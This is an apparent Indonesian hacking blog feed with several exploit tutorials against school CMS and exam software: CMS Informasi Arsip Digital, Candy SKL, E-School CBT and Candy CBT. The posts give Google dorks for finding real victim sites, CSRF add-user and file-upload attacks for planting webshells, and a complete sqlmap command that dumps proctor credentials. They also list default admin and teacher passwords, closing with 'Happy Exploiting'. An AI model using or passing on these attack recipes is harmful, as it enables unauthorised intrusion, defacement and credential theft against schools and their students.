scheme="http://www.blogger.com/atom/ns#" term="CSRF"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Injection"/><category scheme="http://www.blogger.com/atom/ns#" term="Tools"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Unauthenticated CSRF Add User in CMS Informasi Arsip Digital</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDwGXV-574cF2MlFx-cAH6zxKNVpi8caz3Vf4nqNuf9L5b5e_n_fb7XvnT-MAzS-4JsCm8k6noyGDYhR2nPLpelm3YAvXV7nfg9xx6vKizsuqOkN6nPpRxRMdaR03AdKIZfHdVGzS_qGc6Q6UZH_JHYr7DuWfWyTTBRKj6F3gzfQ_dt3amY9IqDDZd2O0l/s1020/IMG-20191208-WA1732.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1020&quot; data-original-width=&quot;707&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDwGXV-574cF2MlFx-cAH6zxKNVpi8caz3Vf4nqNuf9L5b5e_n_fb7XvnT-MAzS-4JsCm8k6noyGDYhR2nPLpelm3YAvXV7nfg9xx6vKizsuqOkN6nPpRxRMdaR03AdKIZfHdVGzS_qGc6Q6UZH_JHYr7DuWfWyTTBRKj6F3gzfQ_dt3amY9IqDDZd2O0l/s320/IMG-20191208-WA1732.jpg&quot; width=&quot;222&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;div&gt;Halo kawan-kawan EcchiExploit maaf nih saya jarang buat blogger karena sebenernya saya tidak mau update tapi terkadang saya juga memikirkannya hehe....&lt;br /&gt;&lt;br /&gt;oke kali ini saya akan saya membuat exploit dimana di exploit yang sebelumnya saya telah membuat yang AFU atau Arbritary File Upload di CMS Informasi Arsip digital... nah kali ini saya akan share versi add user kalian bisa langsung buat user petugas bukan admin karena yang bisa upload di fitur petugasnya&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Langsung aja kita method PoC nya :&lt;br /&gt;CSRF :&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;script src=&quot;https://gist.github.com/dmzhari/8d2038fd741cdd6912c74dc3d1e507f7.js&quot;&gt;&lt;/script&gt;&lt;/div&gt;&lt;div&gt;Dork :&amp;nbsp;&lt;b&gt;&lt;u&gt;intext:Manajemen file arsip dengan mudah dan cepat. LOGIN USER site:sch.id&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Tutorial :&lt;br /&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Kalian dorking menggunakan dork yang telah saya siapkan di atas&lt;/li&gt;&lt;li&gt;Cari web yang menurut kalian vuln&lt;/li&gt;&lt;li&gt;Masukan kedalam CSRF yang telah saya buatkan dan kalian sudah save kedalam file HTML&lt;/li&gt;&lt;li&gt;Jika sudah masukan webnya kita tinggal jalankan CSRF nya&lt;/li&gt;&lt;li&gt;Bila sudah dijalankan nanti akan ada inputan disana kalian terserah mau isikan apa lalu eksekusi tombolnya&lt;/li&gt;&lt;li&gt;Jika berhasil akan ke redirect ke login&lt;/li&gt;&lt;li&gt;masukan username dan password yang telah di masukan di CSRF tadi dan jangan lupa login sebagai petugas bukan admin&lt;/li&gt;&lt;li&gt;bila sukses akan masuk ke dashboard petugas, disinilah kalian bebas mau melakukan apa saja&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Note : &lt;b&gt;&lt;i&gt;Di CSRF bagian atribut action &quot;/admin/petugas_aksi.php&quot; jangan di ganti karena itu adalah file dimana untuk mengeksekusinya&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Baiklah segitu saja dari saya... semoga beruntung dan Happy Exploiting&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/5624778315096983973/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2023/09/unauthenticated-csrf-add-user-in-cms.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/5624778315096983973'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/5624778315096983973'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2023/09/unauthenticated-csrf-add-user-in-cms.html' title='Unauthenticated CSRF Add User in CMS Informasi Arsip Digital'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDwGXV-574cF2MlFx-cAH6zxKNVpi8caz3Vf4nqNuf9L5b5e_n_fb7XvnT-MAzS-4JsCm8k6noyGDYhR2nPLpelm3YAvXV7nfg9xx6vKizsuqOkN6nPpRxRMdaR03AdKIZfHdVGzS_qGc6Q6UZH_JHYr7DuWfWyTTBRKj6F3gzfQ_dt3amY9IqDDZd2O0l/s72-c/IMG-20191208-WA1732.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-629202306974372326</id><published>2023-04-19T01:00:00.001+07:00</published><updated>2023-04-21T09:05:49.865+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CSRF"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Injection"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Exploit Candy SKL Unauthenticaded CSRF File Upload</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_BktQawoaElCebhLblfW2vVaqf9vcQA5w7jO8kxbIVZ3wtQIlV1xqg78CehY1TNeW5ZOcoICXkjKrND0JZX2Nl5wEmwlzVeNBpWw1hLZsd1ctH1lhVranbPMBei2RQegpGEXfayPTU_XKjixe5wbbO4FGP_5mX-iDGGznXLv_6zJadc1x-QVDULD6sw/s720/IMG-20191208-WA1728.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;531&quot; data-original-width=&quot;720&quot; height=&quot;236&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_BktQawoaElCebhLblfW2vVaqf9vcQA5w7jO8kxbIVZ3wtQIlV1xqg78CehY1TNeW5ZOcoICXkjKrND0JZX2Nl5wEmwlzVeNBpWw1hLZsd1ctH1lhVranbPMBei2RQegpGEXfayPTU_XKjixe5wbbO4FGP_5mX-iDGGznXLv_6zJadc1x-QVDULD6sw/s320/IMG-20191208-WA1728.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Halo Teman-teman saya kembali lagi... Kali ini saya akan mempublish suatu kerentanan atau exploit di sebuah aplikasi Candy SKL.&lt;/p&gt;&lt;p&gt;Di Exploit kali ini si penyerang atau hacker bisa melakukan serangan CSRF dan mengupload file dari CSRF tersebut&lt;/p&gt;&lt;p&gt;Exploit ini hanya bisa di eksekusi dari versi SKL 2022 ke bawah dikarenakan untuk versi update setelahnya sudah di patch..&lt;/p&gt;&lt;p&gt;Mari langsung saja ke tutorialnya :&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Dork :&amp;nbsp;&lt;b&gt;&lt;i&gt;intext:Candy SKL intitle:SKL - Candy School&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;Payload : /&lt;b&gt;&lt;i&gt;admin/upload.php&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;Source Code CSRF :&lt;/li&gt;&lt;/ul&gt;&lt;iframe src=&quot;https://pastebin.com/embed_iframe/05aSQhkZ?theme=dark&quot; style=&quot;border: none; width: 100%;&quot;&gt;&lt;/iframe&gt;
&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Proof of Concept (POC) :&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Seperti biasa kalian dorking terlebih dahulu atau menggunakan target sendiri&lt;/li&gt;&lt;li&gt;Masukan payloadnya jika blank artinya &lt;b&gt;&lt;i&gt;Vuln&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;Lalu gunakan CSRF dan upload file kalian berupa file zip yang didalamnya terdapat file kalian entah itu backdoor atau lainnya, jika kalian masih bingung tentang zip file bisa baca artikel saya yang ini&amp;nbsp;&lt;a href=&quot;https://ecchiexploit.blogspot.com/2022/04/exploit-candy-cbt-284-29x-default.html&quot; target=&quot;_blank&quot;&gt;https://ecchiexploit.blogspot.com/2022/04/exploit-candy-cbt-284-29x-default.html&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Jika sudah terupload dan di eksekusi nanti akan ada notifikasi &quot;&lt;b&gt;Berhasil di Upload&lt;/b&gt;&quot;&lt;/li&gt;&lt;li&gt;Masuk ke folder atau akses tempat kalian upload file yaitu &lt;b&gt;&lt;i&gt;https://skl.target.com/admin/foto_siswa/[folder nama zip kalian]/filekalian.php&lt;/i&gt;&lt;/b&gt; atau &lt;b&gt;&lt;i&gt;https://skl.target.com/admin/foto_siswa/filekalian.php&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;Sekian.. Selamat Exploitasi....&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Versi Video :&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&quot;&quot; class=&quot;BLOG_video_class&quot; height=&quot;266&quot; src=&quot;https://www.youtube.com/embed/1HZmuNUGZbI&quot; width=&quot;320&quot; youtube-src-id=&quot;1HZmuNUGZbI&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;#Happy_Exploit #SKL_Candy_Exploit #Candy_CBT&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/629202306974372326/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2023/04/exploit-candy-skl-unauthenticaded-csrf.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/629202306974372326'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/629202306974372326'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2023/04/exploit-candy-skl-unauthenticaded-csrf.html' title='Exploit Candy SKL Unauthenticaded CSRF File Upload'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_BktQawoaElCebhLblfW2vVaqf9vcQA5w7jO8kxbIVZ3wtQIlV1xqg78CehY1TNeW5ZOcoICXkjKrND0JZX2Nl5wEmwlzVeNBpWw1hLZsd1ctH1lhVranbPMBei2RQegpGEXfayPTU_XKjixe5wbbO4FGP_5mX-iDGGznXLv_6zJadc1x-QVDULD6sw/s72-c/IMG-20191208-WA1728.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-732631394339999837</id><published>2023-04-14T14:36:00.004+07:00</published><updated>2023-04-15T19:25:34.931+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CSRF"/><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Remote Code Execution"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Exploit E-School CBT Unauthenticated Abritrary File Upload (AFU)</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOi-4C8i1H30fhke2pe6pMxHCKTKprkNqXPPSlKxYQGMOStOOr5Xs6Kuu5CqXbNZ2A9WDF2rY_jmSMsaBnkQeDeF_hZ7JkUDSdKurrxssaZMHAYN1bN1iU4lIL-nbD_gkyd67uMW-AC-YDlaofcBmE6-9lnrjmIeUUBXcdUmfPlAbfLYNsLg-goM3W3A/s240/B.H.I(OFFICAL)%2020190921_172151.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;240&quot; data-original-width=&quot;240&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOi-4C8i1H30fhke2pe6pMxHCKTKprkNqXPPSlKxYQGMOStOOr5Xs6Kuu5CqXbNZ2A9WDF2rY_jmSMsaBnkQeDeF_hZ7JkUDSdKurrxssaZMHAYN1bN1iU4lIL-nbD_gkyd67uMW-AC-YDlaofcBmE6-9lnrjmIeUUBXcdUmfPlAbfLYNsLg-goM3W3A/w340-h240/B.H.I(OFFICAL)%2020190921_172151.jpg&quot; width=&quot;340&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Halo teman-teman sudah lama saya tidak pernah upload lagi di blog ini dikarenakan sibuk kerja dan kegiatan di real life.&lt;/p&gt;&lt;p&gt;Yah mungkin ini akan menjadi postingan saya yang terakhir untuk itu kali ini saya akan share saja tentang exploit di CBT E-School yang sempat saya exploit dulu tentang kerentanan default user&lt;/p&gt;&lt;p&gt;Untuk kali ini lebih berbahaya atau critical dikarenakan si hacker atau peretas bisa melakukan file upload tanpa sepengatuan sang host atau user.. lalu bagaimana caranya atau tutorialnya.&lt;/p&gt;&lt;p&gt;Proof Of Concept (POC) :&lt;/p&gt;&lt;p&gt;&amp;nbsp; &amp;nbsp; Payload&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;: &lt;i&gt;&lt;b&gt;/&lt;/b&gt;&lt;b&gt;on-admin/ujiansql.php&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;&amp;nbsp; &amp;nbsp; Dork&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span&gt;:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;intitle:E-School CBT site:id&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;&amp;nbsp; &amp;nbsp; Postfield&amp;nbsp; &amp;nbsp;: &lt;b&gt;&lt;i&gt;files&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&lt;/span&gt;Tutorial :&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span&gt;&amp;nbsp;Kalian dorking terlebih dahulu atau bisa menggunakan target kalian sendiri&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&amp;nbsp;Masukan payload di target kalian jika adanya redirect atau pengalihan URL ke halaman login admin artinya &lt;b&gt;&lt;i&gt;Vuln&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&amp;nbsp;Gunakan csrf online dan masukan postfieldnya&lt;/li&gt;&lt;li&gt;&amp;nbsp;Jika sudah ter-eksekusi masuk ke folder &lt;b&gt;&lt;i&gt;https://target.com/on-admin/[shell kalian].php&lt;/i&gt;&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&amp;nbsp;Selamat Exploiting...&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Hanya segitu saja dari saya semangat meretasnya teman-teman&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;#happyExploit #CBT_Exploit #E-School&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/732631394339999837/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2023/04/exploit-e-school-cbt-unauthenticated.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/732631394339999837'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/732631394339999837'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2023/04/exploit-e-school-cbt-unauthenticated.html' title='Exploit E-School CBT Unauthenticated Abritrary File Upload (AFU)'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOi-4C8i1H30fhke2pe6pMxHCKTKprkNqXPPSlKxYQGMOStOOr5Xs6Kuu5CqXbNZ2A9WDF2rY_jmSMsaBnkQeDeF_hZ7JkUDSdKurrxssaZMHAYN1bN1iU4lIL-nbD_gkyd67uMW-AC-YDlaofcBmE6-9lnrjmIeUUBXcdUmfPlAbfLYNsLg-goM3W3A/s72-w340-h240-c/B.H.I(OFFICAL)%2020190921_172151.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-6315018365469363705</id><published>2022-05-22T12:04:00.002+07:00</published><updated>2022-05-22T12:04:34.668+07:00</updated><title type='text'>Exploit Candy CBT Sql POST Injection 2.9.x</title><content type='html'>&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEZlE1vNelf22R20v1pwPBIRRtGndGjyfQHBH88Lime0GEc7gUHzypk_7SOWbZP6bKp6OZvbJ99tz8dRtT8MvK1namxr_8hikJokmVRvn-SpLkokVayIAlWPYnHionZ39FH4Ezo3sx9qyI7y6INE08KuxjNJwpGQ6RoqgRQoJ_c3cWQ4hFk8HP2QfGWg/s1920/3825473.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1080&quot; data-original-width=&quot;1920&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEZlE1vNelf22R20v1pwPBIRRtGndGjyfQHBH88Lime0GEc7gUHzypk_7SOWbZP6bKp6OZvbJ99tz8dRtT8MvK1namxr_8hikJokmVRvn-SpLkokVayIAlWPYnHionZ39FH4Ezo3sx9qyI7y6INE08KuxjNJwpGQ6RoqgRQoJ_c3cWQ4hFk8HP2QfGWg/w320-h180/3825473.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;&lt;p&gt;&lt;/p&gt;&lt;p&gt;Yah langsung aja dah...&lt;/p&gt;&lt;p&gt;Dork: (Pakai yang content sebelumnya)&lt;/p&gt;&lt;p&gt;Tool: Sqlmap, Decrypt&lt;/p&gt;&lt;p&gt;Link : &lt;a href=&quot;https://github.com/BREAKTEAM/Debcrypt&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;&lt;i&gt;Decrypt&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Payload:&amp;nbsp;&lt;b&gt;sqlmap.py -u &quot;http://target,com/soal.php&quot; --method POST --data &quot;pg=ragu&amp;amp;id_mapel=1*&amp;amp;id_siswa=1&amp;amp;id_soal=1&amp;amp;id_ujian=1&quot; -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Get User/Pass: &lt;b&gt;-D nama_database -T pengawas -C username,password --dump&lt;/b&gt; (Ganti -dbs dengan Payload Ini)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Versi Video :&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;iframe allowfullscreen=&quot;&quot; class=&quot;BLOG_video_class&quot; height=&quot;266&quot; src=&quot;https://www.youtube.com/embed/fb4kCVqbpUc&quot; width=&quot;320&quot; youtube-src-id=&quot;fb4kCVqbpUc&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;#Happy_Exploiting #Candy_CBT_Exploit&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='https://ecchiexploit.blogspot.com/feeds/6315018365469363705/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='https://ecchiexploit.blogspot.com/2022/05/exploit-candy-cbt-sql-post-injection-29x.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6315018365469363705'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2116688564507620479/posts/default/6315018365469363705'/><link rel='alternate' type='text/html' href='https://ecchiexploit.blogspot.com/2022/05/exploit-candy-cbt-sql-post-injection-29x.html' title='Exploit Candy CBT Sql POST Injection 2.9.x'/><author><name>Hari | ./EcchiExploit</name><uri>http://www.blogger.com/profile/05595060091488928047</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdAm9oQZUtl-mM7sSuIp2I9yPPKDz8At2k4IzLqjfXGl8guU-WaeH7fwVxXSGHbx0vRxEOdAPYRxmIBz7mnAa3_JXtIK3WOUO_7n3Qgxl-0bbpfnogLIAFC_6yDakniA/s220/IMG-20200408-WA0076.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEZlE1vNelf22R20v1pwPBIRRtGndGjyfQHBH88Lime0GEc7gUHzypk_7SOWbZP6bKp6OZvbJ99tz8dRtT8MvK1namxr_8hikJokmVRvn-SpLkokVayIAlWPYnHionZ39FH4Ezo3sx9qyI7y6INE08KuxjNJwpGQ6RoqgRQoJ_c3cWQ4hFk8HP2QfGWg/s72-w320-h180-c/3825473.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2116688564507620479.post-3860811604544365825</id><published>2022-04-30T09:37:00.002+07:00</published><updated>2022-05-02T01:19:37.702+07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Deface"/><category scheme="http://www.blogger.com/atom/ns#" term="Shell"/><category scheme="http://www.blogger.com/atom/ns#" term="Tutorial"/><title type='text'>Exploit Candy CBT 2.8.4 &gt; 2.9.x Default User/Password</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;455&quot; data-original-width=&quot;728&quot; height=&quot;250&quot; src=&quot;https://p4.wallpaperbetter.com/wallpaper/796/159/824/anime-loli-baby-girl-wallpaper-preview.jpg&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;ya gimana ya hehe..... intinya yagitulah...&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;untuk exploit yang lain gak akan dibuat karena critical kasian ama developernya....&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;langsung aja ke exploit aja dah males basa basi sebenernya :D&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Dork:&lt;span&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;i&gt;&quot;Support By X-Candy CBT&quot;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Login Admin:&lt;b&gt;&lt;i&gt; /panel/login.php&lt;/i&gt;&lt;/b&gt; or &lt;b&gt;&lt;i&gt;/x-panel/login.php&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Default User/Pass:-&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; &amp;nbsp; &quot;&lt;b&gt;&lt;i&gt;admin/usbk2020&lt;/i&gt;&lt;/b&gt;&quot;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; &amp;nbsp; &quot;&lt;i style=&quot;font-weight: bold;&quot;&gt;guru1/guru1 &lt;/i&gt;or &lt;b&gt;&lt;i&gt;guru1/123456&lt;/i&gt;&lt;/b&gt;&quot; (ganti angkanya hingga 10 itu adalah max user defaultnya)&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;Exploit Upload Shell:&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;jika sudah menemukan yang vuln maka lakukan method ini untuk upload shell&lt;/li&gt;&lt;li&gt;kalian masuk ke dashboard admin/guru lalu ke menu bangsoal&lt;/li&gt;&lt;li&gt;jika disana tidak ada datanya maka pakai param ini &quot;&lt;b&gt;&lt;i&gt;https://target.com/panel/?pg=banksoal&amp;amp;ac=importsoal&amp;amp;id=1&lt;/i&gt;&lt;/b&gt;&quot;&lt;/li&gt;&lt;li&gt;lalu cari bagian file pendukung dan upload file bertipe zip yang didalamnya ada folder dan shell kalian, seperti ini:&lt;/li&gt;&lt;/ul&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 